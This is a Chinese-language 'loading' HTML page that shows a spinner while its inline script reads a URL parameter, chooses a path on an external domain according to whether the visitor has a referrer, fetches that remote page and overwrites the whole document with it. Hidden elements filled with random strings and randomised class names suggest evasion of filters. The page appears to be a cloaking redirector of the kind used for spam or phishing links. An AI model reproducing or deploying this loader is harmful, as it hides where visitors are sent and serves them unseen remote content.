<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .W4U9ouLs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .W4U9ouLs .UOEMSDRe {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .W4U9ouLs .content {
            line-height: 50px;
            text-align: center
        }

        .W4U9ouLs .img {
            width: 100%
        }

        .W4U9ouLs .NHXDFXa {
            text-align: center
        }

        .W4U9ouLs .NHXDFXa span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .W4U9ouLs .NHXDFXa span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .W4U9ouLs .NHXDFXa span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .W4U9ouLs .NHXDFXa span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .W4U9ouLs .NHXDFXa span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .W4U9ouLs .NHXDFXa span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .W4U9ouLs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Iyda0Sq3j(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var F4SELJ = Iyda0Sq3j('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ F4SELJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ F4SELJ +".html?a=share";
		}
		
        kzNzsxAJt9=url+"#"+new Date().getTime();
        kzNzsxAJt9 && function() {
            $.get(kzNzsxAJt9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >cs36GHzKd3LutpfHf4tl8hvwJg4xwrzyo6G0wARk7imL5zZA8HxMjMXWkWop6spBq6vCSRUvFp89kESSeSLhNYGJT</h1>
<b style='display:none' >BFBD9n2AIoDlw7kUJc4OzlS5nEyyhqLYrzkxRlcUrWZm5s3nqjmSU</b>
<a  href='#' style='display:none'>IDeknCBw9Ut6bcSjkvq4iF6YKPmWZajTOafNKhCCI8CmEsgKMktg93nRG4zg9QydZPYR6pAEBglp</a>
<li style='display:none' >OcVEaYadCnJQ2f05iPRPqI34wR2uor9SXhbqQGCnQPi</li><div class="W4U9ouLs">
    <div class="UOEMSDRe">
        <div class="NHXDFXa">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >DuLOnoXSABlD7EPfE5CiwvlJ6moBd0ymPzNZ5pMFqFjq8vFHWHkEo1EiMq4ep0KwXHpc5ZTcXGoXFcHYNtZT8Ok1WOg31twX</li>
<p  style='display:none'>dmlecPT4fX5nAvnRExhXY1u2gucgD7lGetITwpdeAwICxcXzxkcnUzofqRCBFqONNkbcOcmo5aYCJK7</p>
<p  style='display:none'>dmlecPT4fX5nAvnRExhXY1u2gucgD7lGetITwpdeAwICxcXzxkcnUzofqRCBFqONNkbcOcmo5aYCJK7</p>
<ul style='display:none' >A56mywcr0AiEWy95</ul>
<span style='display:none'>jDNKHjVVV8aFXpBakjayyG7rUFeP5brbo1S8dJwsQAayNT7B56i</span>
<div style='display:none'>N422rFvqevNRSKxmwPQIDtaHUefYufFqJxltheqh1SxLzq2Ij6ifmbC16TMjsiHWns</div></body>
</html>